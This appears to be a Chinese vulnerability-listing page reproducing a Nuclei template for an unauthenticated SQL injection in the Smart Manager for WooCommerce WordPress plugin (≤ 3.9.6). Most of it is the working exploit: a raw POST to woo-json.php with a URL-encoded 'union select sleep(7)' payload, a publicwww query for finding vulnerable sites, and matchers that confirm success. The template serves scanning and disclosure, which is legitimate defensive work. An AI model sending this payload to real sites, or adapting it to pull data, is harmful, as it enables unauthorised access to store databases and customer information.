漏洞描述
The Smart Manager For WooCommerce – Stock Management, Bulk Edit & more… WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
wp-smart-manager-sqli: Smart Manager for WooCommerce & WPeC <= 3.9.6 - SQL Injection
PoC代码[已公开]
id: wp-smart-manager-sqli
info:
name: Smart Manager for WooCommerce & WPeC <= 3.9.6 - SQL Injection
author: r3Y3r53
severity: critical
description: |
The Smart Manager For WooCommerce – Stock Management, Bulk Edit & more… WordPress plugin was affected by an Unauthenticated SQL Injection security vulnerability.
remediation: Fixed in version 3.9.7
reference:
- https://wpscan.com/vulnerability/e060fbff-792f-4fb5-baa5-82d80240ec99
- http://cinu.pl/research/wp-plugins/mail_0666ceeca20683907bf82514e8f93e0f.html
- https://wordpress.org/plugins/smart-manager-for-wp-e-commerce/
metadata:
verified: true
max-request: 2
publicwww-query: "/wp-content/plugins/smart-manager-for-wp-e-commerce/"
tags: time-based-sqli,wpscan,wp,wp-plugin,wordpress,smart-manager-for-wp-e-commerce,sqli,vuln
http:
- raw:
- |
GET /wp-content/plugins/smart-manager-for-wp-e-commerce/readme.txt HTTP/1.1
Host: {{Hostname}}
- |
@timeout: 15s
POST /wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
cmd=saveData&edited=%5B%7B%22id%22%3A%22+1%29+union+select+sleep%287%29%2C2%3B+--+%22%7D%5D
matchers:
- type: dsl
dsl:
- 'duration_2>=7'
- 'status_code_2 == 500'
- 'contains(body_1, "Smart Manager for e-Commerce")'
- 'contains(body_2, "rel=\"preconnect") || contains(body, "Error</title>")'
condition: and
# digest: 4b0a00483046022100a2a0aa364b92dbe2f3575251a81b6c95cb5415a16d4a334e3b9c76ee585915c90221009598583df2f3d92910cdd3319cf83ae91cab820fa8809fdcab0ac3de68ca8752:922c64590222798bb761d5b6d8e72950